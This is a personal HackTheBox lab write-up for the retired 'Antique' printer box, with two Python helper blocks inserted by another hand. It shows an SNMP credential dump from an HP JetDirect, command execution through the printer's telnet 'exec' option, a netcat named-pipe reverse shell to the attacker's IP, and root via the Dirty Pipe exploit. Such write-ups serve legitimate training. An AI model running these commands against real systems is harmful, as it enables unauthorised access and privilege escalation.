HackTheBox: Antique
01/13/2024
Finally got VIP. This is an old retired easy box, rated roughly the same difficulty as [[Busqueda]].
I'm going to use 'Guided Mode' if I get stuck, because I want to finish this in about 4 hours.
Enumeration
Only a single open port: telnet on 23.
Enumerating telnet
When I connect to the service via `telnet`, I get a header "HP JetDirect", and then a password prompt. Let me look up what the default password for HP JetDirect is.
It doesn't look like there is a default password, but I stumbled across an exploit specific to JetDirect passwords without actually looking for it: https://www.exploit-db.com/exploits/22319
Dumping printer credentials using CVE-2002-1048
Despite knowing the exploit, this took me almost half an hour to do because I have no experience with the SNMP protocol or its utilities. That was a pain in the nuts.
Basically, in this exploit, you query the printer (if 'query' is the right word) for a specific object identifier (OID). For whatever reason, one particular OID will respond with hex-encoded credentials on vulnerable printers. I guess some printers store the password as an object?
Either way, I finally got it working. Here's what I did:
```
$ snmpget -v2c -cprivate -mALL 10.10.11.107 .1.3.6.1.4.1.11.2.3.9.1.1.13.0
<SNIP>
iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = BITS: 50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32 33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 54 57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 115 119 122 123 126 130 131 134 135
</SNIP>
```
Then, to flex my new `sed` skills, I converted this to a `printf`-friendly format as follows. First, I copied and pasted everything after "BITS:" into a text file. I named this file `hexdump`. Then:
```
$ cat hexdump
50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32 33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 54 57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 115 119 122 123 126 130 131 134 135
$ sed 's/ /\\x/g' hexdump
50\x40\x73\x73\x77\x30\x72\x64\x40\x31\x32\x33\x21\x21\x31\x32\x33\x1\x3\x9\x17\x18\x19\x22\x23\x25\x26\x27\x30\x31\x33\x34\x35\x37\x38\x39\x42\x43\x49\x50\x51\x54\x57\x58\x61\x65\x74\x75\x79\x82\x83\x86\x90\x91\x94\x95\x98\x103\x106\x111\x114\x115\x119\x122\x123\x126\x130\x131\x134\x135
<notice that the leading '50' does not have the '\x'. Need to manually add that in the next step>
$ printf "\x50\x40\x73\x73\x77\x30\x72\x64\x40\x31\x32\x33\x21\x21\x31\x32\x33\x1\x3\x9\x17\x18\x19\x22\x23\x25\x26\x27\x30\x31\x33\x34\x35\x37\x38\x39\x42\x43\x49\x50\x51\x54\x57\x58\x61\x65\x74\x75\x79\x82\x83\x86\x90\x91\x94\x95\x98\x103\x106\x111\x114\x115\x119\x122\x123\x126\x130\x131\x134\x135"
P@ssw0rd@123!!123 ▒"#%&'01345789BCIPQTWXaetuy��������3614592360145
```
So to recap the above, I used `sed` to replace all spaces in the hexdump file with `\x`, because that's how `printf` accepts hex input. Then I ran `printf` with this string (after manually adding the first `\x`) to convert the hex to ASCII.
And there we have it; the printer password appears to be ==P@ssw0rd@123!!123==.
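The same decoding as a small parser, added here as my own example rather than anything from the writeup. It also explains the garbage after the password in the `printf` output: net-snmp prints a BITS value as its hex octets followed by the indices of the bits that are set, so the numbers after the 17 octets are a bit map of the password, not more of it. The parser uses that redundancy as a consistency check instead of guessing where the octets end. The input line is the `snmpget` output from above, joined back onto one line.

```python
"""Parse the BITS value net-snmp printed for the JetDirect password OID and
recover the ASCII string, validating the trailing bit-position list.

Added example, not the writeup's code. SNMP BITS numbering: bit 0 is the
most significant bit of the first octet, bit 8 the MSB of the second, etc.
"""
from string import hexdigits

# Constructed from the snmpget output shown above (wrapped line joined).
SNMPGET_LINE = (
    "iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = BITS: 50 40 73 73 77 30 72 64 40 31 32 33 "
    "21 21 31 32 33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 "
    "49 50 51 54 57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 "
    "115 119 122 123 126 130 131 134 135"
)


def is_hex_octet(tok):
    return len(tok) == 2 and all(c in hexdigits for c in tok)


def set_bit_positions(octets):
    """Indices of set bits, MSB-first within each octet, counted across octets."""
    return [i * 8 + b
            for i, byte in enumerate(octets)
            for b in range(8) if byte & (0x80 >> b)]


def parse_bits_value(line):
    """Return the raw octets of a 'name = BITS: ...' line printed by net-snmp."""
    _, sep, rest = line.partition("= BITS:")
    if not sep:
        raise ValueError("not a BITS value")
    tokens = rest.split()
    # The octet list and the bit-index list can look alike ("33" is a valid
    # octet and a valid index), so try every split point and keep the one
    # where the index list is exactly the set bits of the octets.
    for k in range(len(tokens), -1, -1):
        head, tail = tokens[:k], tokens[k:]
        if not all(is_hex_octet(t) for t in head):
            continue
        if not all(t.isdigit() for t in tail):
            continue
        octets = bytes(int(t, 16) for t in head)
        if set_bit_positions(octets) == [int(t) for t in tail]:
            return octets
    raise ValueError("octets and bit indices never agree; not a BITS line?")


def decode_password(line):
    """The credential string itself, with the bit-index tail stripped."""
    return parse_bits_value(line).decode("ascii")


if __name__ == "__main__":
    print(decode_password(SNMPGET_LINE))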
Searching for RCE
This is a weird one... I don't really know what to do inside a printer. I looked on `searchsploit` for "jetdirect", and one that popped up was an RCE path traversal vulnerability that had a Metasploit module. I'll give this a shot.
```
$ msfconsole
msf6 > use exploit/linux/misc/hp_jetdirect_path_traversal
msf6 exploit(linux/misc/hp_jetdirect_path_traversal) > options

Module options (exploit/linux/misc/hp_jetdirect_path_traversal):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   COMMUNITY  public           yes       SNMP Community String
   RETRIES    1                yes       SNMP Retries
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      9100             yes       The target port (TCP)
   SNMPPORT   161              yes       The SNMP port
   SSL        false            no        Negotiate SSL for incoming connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TIMEOUT    1                yes       SNMP Timeout
   URIPATH                     no        The URI to use for this exploit (default is random)
   VERSION    1                yes       SNMP Version <1/2c>

   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.

Payload options (cmd/unix/bind_busybox_telnetd):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   LOGIN_CMD  /bin/sh          yes       Command telnetd will execute on connect
   LPORT      4444             yes       The listen port
   RHOST                       no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Unix (In-Memory)

msf6 exploit(linux/misc/hp_jetdirect_path_traversal) > set RHOSTS 10.10.11.107
RHOSTS => 10.10.11.107
msf6 exploit(linux/misc/hp_jetdirect_path_traversal) > set COMMUNITY private
COMMUNITY => private
msf6 exploit(linux/misc/hp_jetdirect_path_traversal) > set SNMPPORT 23
SNMPPORT => 23
msf6 exploit(linux/misc/hp_jetdirect_path_traversal) > set RPORT 23
```
For whatever fucked-up reason, this Metasploit module apparently doesn't account for the fact that a password might be set. So I can't use this, at least not without some modification. I could also check GitHub for other PoCs for this CVE. But if that fails, I can just read the Metasploit module code and do it myself by hand.
Or maybe I can disable the password inside the printer? Let's try that first.
The closest thing I saw was to whitelist an IP address using `allow: <ip>`.
Using the printer's shell
Like an idiot, I missed this option when I was viewing the help menu on the printer's telnet interface. But you can run system commands using `exec`.
```
Please type "?" for HELP
> ?
To Change/Configure Parameters Enter:
Parameter-name: value <Carriage Return>

Parameter-name   Type of value
ip:              IP-address in dotted notation
subnet-mask:     address in dotted notation (enter 0 for default)
default-gw:      address in dotted notation (enter 0 for default)
syslog-svr:      address in dotted notation (enter 0 for default)
idle-timeout:    seconds in integers
set-cmnty-name:  alpha-numeric string (32 chars max)
host-name:       alpha-numeric string (upper case only, 32 chars max)
dhcp-config:     0 to disable, 1 to enable
allow:           <ip> [mask] (0 to clear, list to display, 10 max)
addrawport:      <TCP port num> (<TCP port num> 3000-9000)
deleterawport:   <TCP port num>
listrawport:     (No parameter required)
exec:            execute system commands (exec id)
exit:            quit from telnet session
```
There it is, down at the bottom.
```
> exec ls
telnet.py
user.txt
> exec whoami
lp
```
Damn, that's pretty cool that these have actual Linux shells. I suppose that renders the Metasploit thing redundant, since I already have RCE through this.
Let me spawn a busybox-style reverse shell:
```
> exec rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.12 1234 >/tmp/f
```
On my local machine:
```
$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.11.107] 59416
/bin/sh: 0: can't access tty; job control turned off
$ whoami
lp
```
Upgrading the reverse shell: Doing it the right way
I never really try the tty upgrade stuff on reverse shells, because the `zsh` shell Kali uses doesn't seem to like the tty commands.
But I'm going to give it another shot. I'll switch to bash and try it that way.
```
$ bash
$ nc -nlvp 1234
connect to [10.10.14.12] from (UNKNOWN) [10.10.11.107] 59418
/bin/sh: 0: can't access tty; job control turned off
$ export TERM=xterm
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
lp@antique:~$
<background the revshell with CTRL-Z>
kali@kali: stty raw -echo
kali@kali: fg <you wont actually see the prompt here>
lp@antique:~$ reset <this corrects the format>
lp@antique:~$
```
Beautiful. That's the first time I've done that successfully. Now I have tab-completion on the revshell.
Enumerating from inside the printer shell
The first thing I checked was for sudo permissions, which didn't work because I don't know this user's password.
The second check was for interesting SUIDs, but there were no useful ones.
The third check was for the kernel version, which was `5.13.0`. Now THAT's useful; this version is vulnerable to the Dirty Pipe exploit.
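The version check behind that last sentence, written out as an added example of my own (not from the writeup). It classifies a `uname -r` style string against the Dirty Pipe affected range; the version facts come from the public disclosure rather than from this page (the bug exists from 5.8 onward and was fixed in 5.16.11, 5.15.25 and 5.10.102, with later mainline releases carrying the fix). Distro kernels often backport fixes without changing the version number, so a hit here means "check the distro advisory", not "confirmed exploitable".

```python
"""Triage a Linux kernel version string against the Dirty Pipe affected range.

Added example, not part of the writeup. The branch points below are taken
from the public Dirty Pipe disclosure, not from this page.
"""
import re

INTRODUCED = (5, 8, 0)          # bug present from this release on
FIXED_MAINLINE = (5, 17, 0)     # every mainline release from here carries the fix
FIXED_STABLE = {                # stable branches that received a backport
    (5, 16): (5, 16, 11),
    (5, 15): (5, 15, 25),
    (5, 10): (5, 10, 102),
}


def parse_kernel_version(s):
    """Turn '5.13.0-30-generic' (uname -r style) into a (major, minor, patch) tuple."""
    m = re.match(r"\s*(\d+)\.(\d+)(?:\.(\d+))?", s)
    if m is None:
        raise ValueError(f"not a kernel version: {s!r}")
    return int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)


def dirty_pipe_affected(version_string):
    """True if the upstream version number falls inside the affected range.

    Caveat: distro kernels (e.g. Ubuntu's 5.4.0-NNN) backport fixes without
    bumping the version, so this is a triage signal, not proof either way.
    """
    v = parse_kernel_version(version_string)
    if v < INTRODUCED or v >= FIXED_MAINLINE:
        return False
    fixed = FIXED_STABLE.get(v[:2])
    # A stable branch with a backport is clean from its fix release on;
    # branches that never got one (5.11 through 5.14 had reached end of life)
    # stay affected for every patch level.
    return fixed is None or v < fixed


def triage(version_strings):
    """Verdict per version string, e.g. for `uname -r` output gathered from many hosts."""
    return {s: dirty_pipe_affected(s) for s in version_strings}


if __name__ == "__main__":
    # Constructed sample inputs; the first is what the box reported.
    for ver, hit in triage(["5.13.0", "5.15.25", "5.10.101-generic", "6.1.0"]).items():
        print(f"{ver:20} {'affected' if hit else 'not affected'}")
```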
Priv esc: the 'Dirty Pipe' exploit
This couldn't have been easier, to be honest.
I didn't even need to download the code. On my local machine I ran
```
$ searchsploit -x linux/local/50808.c >> dirtypipe.c
```
to dump the source code stored in searchsploit to a C file. I transferred this to the victim by hosting a Python server and using `wget`.
On the victim I compiled it and ran it, attempting to hijack the `pkexec` SUID binary:
```
lp@antique:~$ gcc dirtypipe.c -o dirtypipe
lp@antique:~$ which pkexec
/usr/bin/pkexec
lp@antique:~$ ./dirtypipe /usr/bin/pkexec
[+] hijacking suid binary..
[+] dropping suid shell..
[+] restoring suid binary..
[+] popping root shell.. (dont forget to clean up /tmp/sh ;))
# whoami
root
```